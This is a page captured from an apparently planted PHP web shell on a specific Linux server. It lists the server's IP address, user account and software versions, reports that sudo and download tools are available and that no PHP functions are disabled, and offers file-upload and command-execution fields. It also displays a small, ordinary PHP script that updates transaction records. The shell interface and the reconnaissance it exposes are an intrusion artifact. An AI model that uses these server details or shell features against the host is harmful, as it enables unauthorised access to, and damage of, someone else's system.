403Webshell
Server IP : 173.209.174.21  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux wcfs-server 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : nodor ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/thelittlebigshow/self-hosted/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/thelittlebigshow/self-hosted/update_transaction_field.php
<?php include 'protect.php'; ?>

<?php
include 'db.php';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $id = intval($_POST['id'] ?? 0);
    $field = $_POST['field'] ?? '';
    $value = $_POST['value'] ?? '';

    $allowed_fields = ['quantity', 'price', 'notes'];
    if ($id > 0 && in_array($field, $allowed_fields)) {
        if (in_array($field, ['quantity', 'price'])) {
            $value = floatval($value);
        }

        $stmt = $conn->prepare("UPDATE transactions SET $field = ? WHERE id = ?");
        $stmt->bind_param(in_array($field, ['quantity', 'price']) ? "di" : "si", $value, $id);
        $stmt->execute();
        echo json_encode(['success' => true]);
        exit;
    }
}

echo json_encode(['success' => false]);

Youez - 2016 - github.com/yon3zu
LinuXploit